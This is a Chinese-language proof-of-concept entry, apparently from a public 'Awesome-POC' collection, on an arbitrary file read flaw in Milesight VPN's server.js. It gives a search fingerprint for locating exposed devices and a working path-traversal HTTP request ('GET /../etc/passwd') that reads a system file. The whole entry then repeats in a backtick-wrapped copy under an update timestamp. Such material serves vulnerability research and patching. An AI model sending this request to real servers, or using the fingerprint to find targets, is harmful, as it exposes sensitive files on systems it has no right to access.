Awesome-POC/网络设备漏洞/Milesight VPN server.js 任意文件读取漏洞.md

# Milesight VPN server.js 任意文件读取漏洞

## 漏洞描述

MilesightVPN 是一款软件，可使 Milesight 产品的 VPN 通道设置过程更加简便，并可通过网络服务器界面监控连接状态。其中存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器中敏感文件

## 漏洞影响

Milesight VPN

## 网络测绘

```
"MilesightVPN"
```

## 漏洞复现

登陆页面

![image-20230828161340509](images/image-20230828161340509.png)

验证POC

```
GET /../etc/passwd HTTP/1.1
Host: 
Accept: */*
Content-Type: application/x-www-form-urlencoded
```

![image-20230828161357209](images/image-20230828161357209.png)
update 2024-11-06 14:10:36 +08:00			`# Milesight VPN server.js 任意文件读取漏洞`

			`## 漏洞描述`

			`MilesightVPN 是一款软件，可使 Milesight 产品的 VPN 通道设置过程更加简便，并可通过网络服务器界面监控连接状态。其中存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器中敏感文件`

			`## 漏洞影响`

			`Milesight VPN`

			`## 网络测绘`

			```
			`"MilesightVPN"`
			```

			`## 漏洞复现`

			`登陆页面`

			`![image-20230828161340509](images/image-20230828161340509.png)`

			`验证POC`

			```
			`GET /../etc/passwd HTTP/1.1`
			`Host:`
			`Accept: /`
			`Content-Type: application/x-www-form-urlencoded`
			```

			`![image-20230828161357209](images/image-20230828161357209.png)`